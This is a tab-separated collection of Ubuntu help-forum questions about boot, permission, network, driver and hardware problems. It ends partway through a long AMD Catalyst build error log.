429854	sudo : unable to change to sudoers gid : operation not permitted	i installed ubuntu server 12.04 , then i installed ubuntu-desktop . after i installed the desktop interface . i was not able to login with to the administrator account . when i use su and put user/pwd it says authentication failure . also , when i used sudo it says , sudo : unable to change to sudoers gid : operation not permitted . this ubuntu server copy is installed on vm environment . i appreciate any help from you
429857	cluster , pxe boot , without disk	i would like to build a cluster to handle converting the movie . at home i have 12 dell without disk . all c2d 1gb ddr2 . the assumption is such that - one server connected to the switch . master - all other computers are no hdd , no monitor , no battery and booting from the network . i would like to master had connect under ssh , and each next machine automatically getting up `` attaches '' own processor to the master . it is possible . what software do i use it , more or less an as configure . very much i read . but virtually all projects are dead ; ( . waiting for a quick response . sorry for my weak english ; )
429859	grub was removed . not a duplicate because:	important differences from `` duplicates '' win 8.1 installer doesnt boot.nothing boots . i tried boot repair but the repository gives me 404 i tried grub-install but fails cuz i cant use 64 bit live usb so chroot fails.i only have 32 bit cpus here . so none of the `` duplicates '' help my not duplicate question here : installed win8.1 installer with error to /dev/sdc1 grub is removed and nothing boots
429862	need to change ownership or permissions of /media/movies folder..newbie	i am using ubuntu 12.04 as a movie server . i partitioned a external drive ( dev/sdd2 ) ( named movies ) as ext4 and it mounts under media . i am trying to add movies to this partition to watch through plex . i keep getting an error saying file is read only , and i do n't have permission . i looked and root is the owner . what is the best way to get my user ( cw ) to become the owner or have permission to read and write the partition ? i am very new to ubuntu , so please put in lay mans terms . i have tried the terminal command sudo shown -r cw : cw /media/movies and i 've tried sudo chmod 777 /media/movies they did n't work , i ( cw ) still not able to add movies to the partition..
429864	bad wifi reception	for some reason i got a really bad wifi reception in my bedroom under ubuntu . under windows everything is fine . my tablet and my phone do n't have problems either . by bad reception i mean that i have to put my laptop in specific area to have a connection and i often need to move because i lost the connection ... ca n't figure out why . ~ # lshw -c net *-network description : wireless interface product : centrino advanced-n 6235 vendor : intel corporation physical id : 0 bus info : pci @ 0000:08:00.0 logical name : wlan0 version : 24 serial : c4:85:08 : b1:24:84 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-17-generic firmware=18.168.6.1 ip=192.168.2.12 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:48 memory : d2600000-d2601fff # iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' hotixiaspot '' mode : managed frequency:2.452 ghz access point : ec:1a:59:04:70 : bc bit rate=57.8 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=44/70 signal level=-66 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:23426 invalid misc:1524 missed beacon:0
429865	ubuntu 3.10 appearance menu missing	i installed ubuntu gnome 3.10 , but i have decided to move back to unity for a variety of reasons ... i have installed ubuntu-desktop all ok.. however one issue is that in the settings page , there is no appearance menu . can this be manually installed ? thanks
429866	system shutdown , instead suspend or hibernate	i have here an lg laptop s 460 , intel core i5 , with 4 gb memory . i ca n't get suspend/hibernate with kde running on ubuntu or kubuntu suspend/hibernate do n't work properly . with mageia , everything work pretty well ... even with pearos or elementaryos . but when i use ubuntu/kubuntu i am able to put the laptop into suspend/hibernate state , but when i wake up the laptop , the system simply shutdown and even do n't let me put my password ! totally crazy ! ! now , i install the kubuntu alpha , hoping that this problem was solved , but still does n't work ... kernel : linux qapla 3.13.0-15-generic # 35-ubuntu smp mon mar 3 15:54:59 utc 2014 x86_64 x86_64 x86_64 gnu/linux thanks for any help ...
429868	keyboard language problem	my keyboard is originally in spanish , but it automatically changed to english when i updated to ubuntu 13.10 . i need it in spanish . how do i switch it back ?
429869	is this a correct way to enable htaccess in apache 2.4.7 on ubuntu 12.04	in almost every solution of `` how to activate htaccess '' , they say that the /etc/apache2/sites-available/default file needs to be edited . but there is n't such file in apache 2.4.7 i read somewhere that the new default file is 000-default.conf . so i edited that one and tried to add the line : allowoverride all but apache2 did not restart correctly and gave an error . from an apache2 documentation , i found that allowoverride is only allowed under the section . then i tried adding this : < directory `` /var/www '' > allowoverride all < /directory > and this seems to work . but i am not sure if i should have put /var/www there . is it a correct way of doing it or will my computer blow up somehow ? thanks .
429870	complicated genisoimage hybrid for mac/linux/windows	i need to create an iso with a folder that is common on all os and with os specific folders & files . the os specific folders & files need to be visible only on that os . so the mac user should not be able to see the linux & windows files ! so far i managed to create a iso where on ubuntu only the ubuntu files are visible and on windows only the windows files are visible . but when i mount the iso on mac os x 10.8.5 and mac os x 10.6.8 only the windows files are visible . another problem is when i wrote the iso on a dvd . on all os only the windows files are visible from the dvd . the cmd i used under ubuntu 12.04 lts 32 bit is ( linux version of the app is 32 bit only ) : genisoimage -iso-level 3 -hfs -j -r -v `` name_of_dvd '' -hide-list mac.list -hide-list windows.list -hide-joliet-list linux.list -hide-joliet-list mac.list -hide-joliet-list scripts.list -hide-hfs-list scripts.list -hide-hfs-list windows.list -hide-hfs-list linux.list -hide autoplay -hide-hfs autoplay -allow-limited-size -o hybrid.iso linux mac windows scripts data data is common folder - iso is expected to be dvd 9 - 7gb+ so can anyone help me get the only the mac files to show on mac and some instruction on how the iso needs to be burned in order to keep the hidden files hidden for each os !
429871	dual monitor dvi + displayport = blurry text fonts	so i'am using the current config : ubuntu 12.04 , ati radeon graphic card , dell monitor ( let 's call this monitor a ) connected with dvi cable . the image quality is very good on monitor a . then i connected a second monitor ( same dell model ) using display port adapter . on the second monitor ( let 's call it b ) , the text fonts are ( slightly ) blurry . monitor b does not have a hardware problem , because i used it before on another machine without any problems . then i tried to connect monitor b on the vga plug of my desktop ( with monitor a on dvi cable ) . but ubuntu showed an error message at boot . i should also add that i already installed amd catalyst drivers , and i have tried various resolution settings with no avail . the text fonts are still blurry on monitor b . any suggestion is welcome .
429872	ubuntu does not load the remote control to start	i just purchased a philips remote control rc-197 with its usb receiver , lsusb recognizes it as : bus 004 device 002 : id 0471:060c philips ( or nxp ) consumer infrared transceiver ( hp ) lirc install the software center . lirc set it up from the terminal with : * $ sudo su* * $ dpkg-reconfigure lirc* remote control configuration : windows media center transciever/remotes ( all ) ir transmitter , if present : none after i run irw : * $ irw* 000000037ff07bf2 00 key_home mceusb 000000037ff07bdc 02 key_back mceusb 000000037ff07be4 00 key_again mceusb ... the remote works well and all buttons . the problem is that when i restart ubuntu 13.10 no longer operates the remote control with lsusb is recognized as before , but now i run irw does not recognize , and i have to re-configure it to recognize it . how i can do to make the remote control is loaded at the start of ubuntu and not have to reconfigure every time you boot ubuntu ? . many thanks .
429874	can not install from usb	i am trying to install ubuntu server 12.04 lts on a server that has only usb boot capability ( no cdrom , no pxe ) . i have tried to use 3 different tools but all have failed . the tools i have tried are these : linux live usb creator 2.8.27 : fails when the installer gets to `` load installer components from cd '' universal usb installer 1.9.5.2 : failed fairly early trying to mount /mount/casper ( or something like that ) unetbootin ( no version info ) : failed when the installer gets to `` load installer components from cd '' how do i ( from windows 7 x64 ) prepare the iso on to a usb drive to allow me to install ubuntu ? edit : i have checked the install log ( /var/log/syslog ) to see why it fails and this is what i see : anna [ 9142 ] warning ** : package retrieval failed cdrom-retriever : error : unable to find 'pool/main/l/linux-lts-saucy/block-modules-3.11.0-15-generic-di_3.11.0-15.25~precise1_amd64.udeb' checking that folder , the closest resembling file is this : /cdrom/pool/main/l/linux-lts-saucy/block-modules-3.11.0-15-generic-di_3.11.0-15.25~precise1_amd6.ude the only difference is 'amd64 ' is 'amd6 ' and '.udeb ' is '.ude ' . as more than 1 tool generates this error , could this be a mastering error in the 12.04.4 amd64 ubuntu server iso file ?
429876	usb drive not responding	so i am unable delete a few video files on my thumb drive even though my permissions are set to read and write and create and delete . i tried reformatting ( mounting ) the thumb drive in disk utility but it says the usb drive is busy . please help . i 'm running 12.04 lts . thanks .
429878	install thunderbird 32 on ubuntu 64	i would like to install 32 bit version of thunderbird on ubuntu 64 . any ideas ?
429886	ubuntu 13.10 installed uefi	intel® core™ i7-3520m cpu @ 2.90ghz × 4 graphics : intel® ivybridge mobile os : 64-bit 128 ssd lenovo z580 ubuntu 13.10 i installed ubuntu on this machine completley wiping off windows 8.1 . i have set it up and everything works great . sometimes when i reboot i get the black freeze screen . i will have to hold power button to restart and usually this will work . sometimes after 2 or 3 times . sometimes it boots fine . trying to find a fix to get it running and booting smooth
429887	ubuntu server ( postfix ) mismatch of version apt-get install and apt-get source	i tried to apply vda patch to postfix , but i see that my installed version is 2.9.6 installed via apt-get install . while when i try to get source apt-get source , it gave me 2.9.1 . so what is happening here ?
429888	unable to locate package python-gnomedesktop	while installing : sudo apt-get install python-gnomedesktop python-rsvg ipython i receive the error : e : unable to locate package python-gnomedesktop
429896	iptables help with server on 12.04 ?	i am trying to create a minecraft server with port 25565 for me and my friends to access . i used to run one on my mac , where i would change the config for my firewall to allow connections through different ports when my public ip changed ; then tell my friends to change the ip they should connect to when necessary . but i got sick of this , and wanted to run the server from a remote computer to act as a server which could be controlled via ssh from my main computer . and so you could connect to it from a hostname rather than the actual ip address . now , i have a computer running ubuntu desktop 12.04 and a set of rules to allow ports 25565 , 22 and 10000 ( for webmin ) . it has a service set to run the executable for the server when it is commanded to and it works on lan but not outside my network . it has a reserved private ip and i am using a dynamic update client ( ddclient ) to update the public ip from the system every x minutes . this updates to dyndns.com , but i understand linux has a client firewall and network manager , iptables which i do n't have much experience using and this is where i got stuck and thought i should come for help . my isp , sky supports dns from dyndns.com specifically . so that works fine , but it does n't support fixed external ip addresses so i ca n't create a network card for an outfacing network because it will just change ? i thought i might be able to create one that will search my dyndns.com profile to find my external ip and update it every x minutes . but i am unsure of how to do this to make it work properly . also i want to route my internal ip to my external from a postrouting rule . now i understand that i might have to configure a cron script to update my iptables from my dyndns.org account but that is irrelevant . how would i go about doing all this ? thanks ! here are some things i thought might be helpful : output for iptables -l : chain input ( policy accept ) target prot opt source destination accept all -- anywhere anywhere state related , established accept udp -- anywhere anywhere udp dpt : domain accept tcp -- anywhere anywhere tcp dpt : domain accept udp -- anywhere anywhere udp dpt:25565 accept tcp -- anywhere anywhere tcp dpt:25565 accept tcp -- anywhere anywhere tcp dpt : ssh accept udp -- anywhere anywhere udp dpt : ssh accept udp -- anywhere anywhere udp dpt:10000 accept tcp -- anywhere anywhere tcp dpt : webmin chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination mcserver @ helloworld : ~ $ output for ifconfig : eth0 link encap : ethernet hwaddr 00:0e:7f : a9:10:54 inet addr:192.168.0.8 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :20e:7fff : fea9:1054/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:687 errors:0 dropped:0 overruns:0 frame:0 tx packets:588 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:221050 ( 221.0 kb ) tx bytes:106677 ( 106.6 kb ) interrupt:20 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:200 errors:0 dropped:0 overruns:0 frame:0 tx packets:200 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:16564 ( 16.5 kb ) tx bytes:16564 ( 16.5 kb )
429897	change order of service at system start	i have a problem on my server where varnish is n't allowing apache to load properly . it 's probably just a config problem but the present solution is simply to stop varnish , restart apache and then restart varnish . is there an easy way to tell ubuntu to load varnish after apache on system boot until i have time to go back and look at this ?
429898	title bar disappeared and window manager breakage in ubuntu 13.10 after upgrade	this is my window face after i upgraded my ubuntu : why is that happened ?
429901	how can i ping a computer or a printer using its mac address ?	suppose i have a printer in my network has a mac address : 11:22:33:44:55:66 . is there a way i can ping it to see if its up or down using its mac address ? any help ?
429907	log in screen background different from desktop	since ubuntu 13.04 , in my laptop , when i choose an image as desktop background from my pictures folder , the login screen remains as the default purple image . to solve that i had to add the image i wanted to /usr/share/backgrounds . later on , i upgraded to ubuntu 13.10 , and the same thing happened . but then , one day i installed ubuntu 13.10 in another computer , and i realized that when i chose an image from the pictures folder as desktop background , the image appeared in the login screen . so how is this possible ? is it because i upgraded from 13.04 to 13.10 in my laptop , and the one in the other computer was a fresh installation of 13.10 ? and , what can i do to fix this ? best regards , juan
429909	ca n't connect to my bluetooth speakers fenda w330bt . connection failed : stream setup failed	i ca n't connect to my bluetooth speakers fenda w330bt . blueman connect to the already paired device and throws me an error `` connection failed : stream setup failed '' . can somebody help me with this problem ?
429913	how to add openvpn connection in netman without a client cert ?	i 've had a look around and ca n't find this on any other threads ; i wondered if it 's possible to add an openvpn connection to netman without a client certificate ? my office setup uses an openvpn server which i connect to , but it does n't require any cert files as we use wikid token to generate a random password for each user every 90 seconds . i can get into the vpn fine from windows , but in ubuntu it just times out every time so i 'm not sure where i 'm going wrong . can anyone shed any light on this ?
429916	extend partition size on a ubuntu server	i have a ubuntu server that is run as a vm , i have added additional space to the vm through the reconfiguration portal where my server is hosted . i know that the additional space has been provisioned for use on the server but it still needs to be allocated . i am unsure of the process involved in trying to allocate newly provisioned space on a ubuntu server . ( generally a windows user , i want to extend the sda3 partition to include an additional 100gb . similar to the function available in windows through disk management , the space shows up as un-allocated but needs to be assigned to a specific drive . ) i would like to do this from the command line and not through a tool like g-parted , could someone please point me in the right direction ! thanks !
429920	help ! asap with linux	i put linux onto one of my usb sticks using universal usb installer . then i booted onto the usb after restarting the computer . i decided to try linux , but after trying it i decided to install ubuntu 13.10 on another usb , so i did that . however after trying to boot from my newly installed usb stick ( 2nd usb ) , the system just froze at the beginning and nothing shows up after 5 minutes . so i pressed the power button to shut down . when i try to get back onto my windows ( installed on my hard drive ) without any usb attached to the computer , the screen opens up a black screen with gnu grub2 . something like this below shows up : gnu grub version 2.00 [ minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device/file completions . esc at any time exits. ] grub > _ i am very new to linux , and hopefully i can get some help . i want to know if i can bypass this screen and boot into my windows because i have everything in there . thank you so much .
429922	gpg : do n't know invalid packet ( ctb=0a )	ok so , i 'm trying to decrypt a pgp file with the gpg command : gpg -- decryt myfile and it answers me : gpg : data encrypted using cast5 gpg : encrypted using one passphrase gpg : [ do n't know ] : invalid packet ( ctb=0a ) gpg : warning : message was not integrity protected gpg : [ do n't know ] : invalid packet ( ctb=59 ) do you guys have any idea ?
429940	how to find out which service uses a certain cpu core ?	how can i find out which process/application uses core number 4 ? as i saw in htop there is n't any application which uses high cpu , but still my fan is running `` wild '' and also the cpu graphic in htop is 100 % .
429941	proxy tunneling failed : proxy authentication requiredunable to establish ssl connection	wget https : //raw.github.com/mseknibilel/openstack-grizzly-install-guide/master/keystonescripts/keystone_basic.sh -- 2014-03-05 12:55:27 -- https : //raw.github.com/mseknibilel/openstack-grizzly-install-guide/master/keystonescripts/keystone_basic.sh resolving proxy4.xxxxx.com ( proxy4.xxxxx.com ) ... 10.201.51.54 connecting to proxy4.xxxxx.com ( proxy4.xxxxx.com ) |10.201.51.54|:8080 ... connected . proxy tunneling failed : proxy authentication requiredunable to establish ssl connection . could someone let me know , where and in which file i need to set proxy password and user to get wget working ? .
429942	blank/empty hostname	i am using ubuntu 12.10 and i was wondering if there is way to not send my hostname when connecting to a router ? for example when i connect to my router i can see my laptop hostname when i log on the router , under `` dhcp leases '' . i dont want to change my hostname , i would just like to not send anything so that under `` hostname '' in my router my laptop mac address appears with no name . is that possible ? i have noticed sometimes that blank hostnames do appear for some connected devices . edit : i am aware of this how can i stop sending my hostname via dhcp ? however it does not seem to work under ubuntu 12.10 .
429944	difference between cat and sudo cat ?	can you tell me what the difference is between cat and sudo cat ? all i know so far is that cat is used for displaying contents of file and concatenation .
429945	what is the hardware address of my webcam mic ?	i know that the video is /dev/video0 however i do not know how to find the hardware address of my mic . i know that it is not hw:0,0 or any of those . the output of aplay -- list-device is : **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 0 : alc889 analog [ alc889 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 1 : alc889 digital [ alc889 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : nvidia [ hda nvidia ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : nvidia [ hda nvidia ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : nvidia [ hda nvidia ] , device 9 : hdmi 3 [ hdmi 3 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 the command i 'm trying to find the address for is : cvlc v4l2 : ///dev/video0 : v4l2-standard= : inputlave=alsa : //hw:0,0 : live-caching=300 : sout= '' # transcode { vcodec=wmv2 , vb=800 , scale=1 , acodec=wma2 , ab=128 , channels=2 , samplerate=44100 } : http { dst=:8080/stream.wmv } '' the inputlave=alsa : //hw:0,0 i believe needs to be changed .
429946	custom keyboard layouts : adding a character for which no keysym is defined	a couple of years ago , i followed the custom keyboard layout howto , and have been in dvorak+bilingual+typographic bliss ever since . iâd now like to add the thin non-breaking space ( u+202f ) as one of my alternate keys in my arsenal ( which precedes colons and question marks when writing in french ) , but it appears that no keysym is defined for this character in /usr/include/x11/keysymdef.h , so itâs not clear to me how to go about adding it . any thoughts ? is there some way i can simply provide the unicode number in the layout definition file ? or is there a way to define a new keysym ? thanks in advance .
429953	help with amd catalyst installation	i 'm trying to install the amd catalyst driver , to use my radeon hd7770 with ubuntu 13.10 . i was following these steps , and i 've success in the wget download , but in driver installation , something is wrong ... i use this code : sudo ./amd-driver-installer-13.35.1005-x86.x86_64.run -- buildpkg ubuntu/saucy and get this error : created directory fglrx-install.1xtqfa verifying archive integrity ... all good . uncompressing amd catalyst ( tm ) proprietary driver-13.35.1005 ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ===================================================================== amd catalyst ( tm ) proprietary driver installer/packager ===================================================================== generating package : ubuntu/saucy resolving build dependencies ... apt 0.9.9.1~ubuntu1 for amd64 compiled on sep 11 2013 17:45:21 usage : apt-get [ options ] command apt-get [ options ] install|remove pkg1 [ pkg2 ... ] apt-get [ options ] source pkg1 [ pkg2 ... ] apt-get is a simple command line interface for downloading and installing packages . the most frequently used commands are update and install . commands : update - retrieve new lists of packages upgrade - perform an upgrade install - install new packages ( pkg is libc6 not libc6.deb ) remove - remove packages autoremove - remove automatically all unused packages purge - remove packages and config files source - download source archives build-dep - configure build-dependencies for source packages dist-upgrade - distribution upgrade , see apt-get ( 8 ) dselect-upgrade - follow dselect selections clean - erase downloaded archive files autoclean - erase old downloaded archive files check - verify that there are no broken dependencies changelog - download and display the changelog for the given package download - download the binary package into the current directory options : -h this help text . -q loggable output - no progress indicator -qq no output except for errors -d download only - do not install or unpack archives -s no-act . perform ordering simulation -y assume yes to all queries and do not prompt -f attempt to correct a system with broken dependencies in place -m attempt to continue if archives are unlocatable -u show a list of upgraded packages as well -b build the source package after fetching it -v show verbose version numbers -c= ? read this configuration file -o= ? set an arbitrary configuration option , eg -o dir : :cache=/tmp see the apt-get ( 8 ) , sources.list ( 5 ) and apt.conf ( 5 ) manual pages for more information and options . this apt has super cow powers . unable to resolve debhelper dh-modaliases execstack . please manually install and try again . package build failed ! package build utility output : ./packages/ubuntu/ati-packager.sh : 294 : ./packages/ubuntu/ati-packager.sh : debclean : not found ./packages/ubuntu/ati-packager.sh : 295 : ./packages/ubuntu/ati-packager.sh : dpkg-buildpackage : not found ./packages/ubuntu/ati-packager.sh : 294 : ./packages/ubuntu/ati-packager.sh : debclean : not found dpkg-buildpackage : source package fglrx-installer dpkg-buildpackage : source version 2:13.350-0ubuntu1 dpkg-buildpackage : source changed by amd : advanced micro devices . dpkg-source -- before-build fglrx.l4u467 dpkg-buildpackage : host architecture amd64 debian/rules build # create important strings for i in 10fglrx \ dkms.conf \ fglrx.install \ fglrx-dev.install \ fglrx-dev.links \ fglrx-amdcccle.install \ fglrx.grub-gfxpayload \ fglrx.dirs \ fglrx.links \ fglrx.postinst \ fglrx.postrm \ fglrx.preinst \ fglrx.prerm \ overrides/fglrx ; do \ sed -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # libdir # |usr/lib|g '' \ -e `` s| # libdir32 # |usr/lib32|g '' \ -e `` s| # bindir # |usr/bin|g '' \ -e `` s| # sysconfdir # |etc|g '' \ -e `` s| # mandir # |usr/share/man/man1|g '' \ -e `` s| # ldsoconf # |usr/lib/fglrx/ld.so.conf|g '' \ -e `` s| # altldsoconf # |usr/lib/fglrx/alt_ld.so.conf|g '' \ -e `` s| # altpriority # |1000|g '' \ -e `` s| # pxaltpriority # |900|g '' \ -e `` s| # autostartdir # |etc/xdg/autostart|g '' \ -e `` s| # datadir # |usr/share|g '' \ -e `` s| # pkgdeskdir # |usr/share/fglrx|g '' \ -e `` s| # pkgdatadir # |usr/share/fglrx|g '' \ -e `` s| # pkgconfigdir # |usr/lib/fglrx|g '' \ -e `` s| # pkgbindir # |usr/lib/fglrx/bin|g '' \ -e `` s| # pkglibdir # |usr/lib/fglrx|g '' \ -e `` s| # pkglibdir32 # |usr/lib32/fglrx|g '' \ -e `` s| # pkgdriversdir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextra # |usr/lib/x86_64-linux-gnu/xorg/extra-modules|g '' \ -e `` s| # pkgextensiondir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextensionsdir # |usr/lib/xorg/modules/extensions|g '' \ -e `` s| # drivername # |fglrx|g '' \ -e `` s| # driverdevname # |fglrx-dev|g '' \ -e `` s| # driversrcname # ||g '' \ -e `` s| # includedir # |usr/include|g '' \ -e `` s| # pkglibconfdir # |lib/fglrx|g '' \ -e `` s| # grubblklistdir # |usr/share/grub-gfxpayload-lists/blacklist|g '' \ -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # pxdir # |usr/lib/pxpress|g '' \ -e `` s| # pxdir32 # |usr/lib32/pxpress|g '' \ -e `` s| # pxxmoddir # |usr/lib/pxpress/xorg/modules|g '' \ -e `` s| # pxdirname # |pxpress|g '' \ -e `` s| # pxlibdir # |usr/lib/pxpress/lib|g '' \ -e `` s| # pxlibdir32 # |usr/lib32/pxpress/lib|g '' \ -e `` s| # pxldsoconf # |usr/lib/pxpress/ld.so.conf|g '' \ -e `` s| # altpxldsoconf # |usr/lib/pxpress/alt_ld.so.conf|g '' \ -e `` s| # cversion # |13.350|g '' \ -e `` s| # srcxarch # |xpic_64a|g '' \ -e `` s| # srcarch # |x86_64|g '' \ -e `` s| # srcotherarch # |x86|g '' \ -e `` s| # srclibdir # |lib64|g '' \ -e `` s| # deb_host_multiarch # |x86_64-linux-gnu|g '' \ -e `` s| # other_arch # |i386-linux-gnu|g '' \ debian/ $ i.in > debian/ $ i ; \ done # remove exec bit on everything find arch \ etc \ lib \ module \ usr \ xpic_64a -type f | xargs chmod -x find : `module ' : no such file or directory # set executable on user apps find arch/x86_64/usr/sbin \ arch/x86_64/usr/x11r6/bin \ usr/sbin/ -type f | xargs chmod a+x # set exec bit on scripts find lib etc debian -name `` *.sh '' -type f | xargs chmod +x # set the permissions on the pxpress scripts chmod 744 debian/pxpress/switch* dh build make : dh : command not found make : *** [ build-arch ] error 127 dpkg-buildpackage : error : debian/rules build gave error exit status 2 ./packages/ubuntu/ati-packager.sh : 294 : ./packages/ubuntu/ati-packager.sh : debclean : not found dpkg-buildpackage : source package fglrx-installer dpkg-buildpackage : source version 2:13.350-0ubuntu1 dpkg-buildpackage : source changed by amd : advanced micro devices . dpkg-source -- before-build fglrx.ueq8hk dpkg-buildpackage : host architecture amd64 debian/rules build # create important strings for i in 10fglrx \ dkms.conf \ fglrx.install \ fglrx-dev.install \ fglrx-dev.links \ fglrx-amdcccle.install \ fglrx.grub-gfxpayload \ fglrx.dirs \ fglrx.links \ fglrx.postinst \ fglrx.postrm \ fglrx.preinst \ fglrx.prerm \ overrides/fglrx ; do \ sed -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # libdir # |usr/lib|g '' \ -e `` s| # libdir32 # |usr/lib32|g '' \ -e `` s| # bindir # |usr/bin|g '' \ -e `` s| # sysconfdir # |etc|g '' \ -e `` s| # mandir # |usr/share/man/man1|g '' \ -e `` s| # ldsoconf # |usr/lib/fglrx/ld.so.conf|g '' \ -e `` s| # altldsoconf # |usr/lib/fglrx/alt_ld.so.conf|g '' \ -e `` s| # altpriority # |1000|g '' \ -e `` s| # pxaltpriority # |900|g '' \ -e `` s| # autostartdir # |etc/xdg/autostart|g '' \ -e `` s| # datadir # |usr/share|g '' \ -e `` s| # pkgdeskdir # |usr/share/fglrx|g '' \ -e `` s| # pkgdatadir # |usr/share/fglrx|g '' \ -e `` s| # pkgconfigdir # |usr/lib/fglrx|g '' \ -e `` s| # pkgbindir # |usr/lib/fglrx/bin|g '' \ -e `` s| # pkglibdir # |usr/lib/fglrx|g '' \ -e `` s| # pkglibdir32 # |usr/lib32/fglrx|g '' \ -e `` s| # pkgdriversdir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextra # |usr/lib/x86_64-linux-gnu/xorg/extra-modules|g '' \ -e `` s| # pkgextensiondir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextensionsdir # |usr/lib/xorg/modules/extensions|g '' \ -e `` s| # drivername # |fglrx|g '' \ -e `` s| # driverdevname # |fglrx-dev|g '' \ -e `` s| # driversrcname # ||g '' \ -e `` s| # includedir # |usr/include|g '' \ -e `` s| # pkglibconfdir # |lib/fglrx|g '' \ -e `` s| # grubblklistdir # |usr/share/grub-gfxpayload-lists/blacklist|g '' \ -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # pxdir # |usr/lib/pxpress|g '' \ -e `` s| # pxdir32 # |usr/lib32/pxpress|g '' \ -e `` s| # pxxmoddir # |usr/lib/pxpress/xorg/modules|g '' \ -e `` s| # pxdirname # |pxpress|g '' \ -e `` s| # pxlibdir # |usr/lib/pxpress/lib|g '' \ -e `` s| # pxlibdir32 # |usr/lib32/pxpress/lib|g '' \ -e `` s| # pxldsoconf # |usr/lib/pxpress/ld.so.conf|g '' \ -e `` s| # altpxldsoconf # |usr/lib/pxpress/alt_ld.so.conf|g '' \ -e `` s| # cversion # |13.350|g '' \ -e `` s| # srcxarch # |xpic_64a|g '' \ -e `` s| # srcarch # |x86_64|g '' \ -e `` s| # srcotherarch # |x86|g '' \ -e `` s| # srclibdir # |lib64|g '' \ -e `` s| # deb_host_multiarch # |x86_64-linux-gnu|g '' \ -e `` s| # other_arch # |i386-linux-gnu|g '' \ debian/ $ i.in > debian/ $ i ; \ done # remove exec bit on everything find arch \ etc \ lib \ module \ usr \ xpic_64a -type f | xargs chmod -x find : `module ' : no such file or directory # set executable on user apps find arch/x86_64/usr/sbin \ arch/x86_64/usr/x11r6/bin \ usr/sbin/ -type f | xargs chmod a+x # set exec bit on scripts find lib etc debian -name `` *.sh '' -type f | xargs chmod +x # set the permissions on the pxpress scripts chmod 744 debian/pxpress/switch* dh build make : dh : command not found make : *** [ build-arch ] error 127 dpkg-buildpackage : error : debian/rules build gave error exit status 2 ./packages/ubuntu/ati-packager.sh : 294 : ./packages/ubuntu/ati-packager.sh : debclean : not found dpkg-buildpackage : source package fglrx-installer dpkg-buildpackage : source version 2:13.350-0ubuntu1 dpkg-buildpackage : source changed by amd : advanced micro devices . dpkg-source -- before-build fglrx.yu05ho dpkg-buildpackage : host architecture amd64 debian/rules build # create important strings for i in 10fglrx \ dkms.conf \ fglrx.install \ fglrx-dev.install \ fglrx-dev.links \ fglrx-amdcccle.install \ fglrx.grub-gfxpayload \ fglrx.dirs \ fglrx.links \ fglrx.postinst \ fglrx.postrm \ fglrx.preinst \ fglrx.prerm \ overrides/fglrx ; do \ sed -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # libdir # |usr/lib|g '' \ -e `` s| # libdir32 # |usr/lib32|g 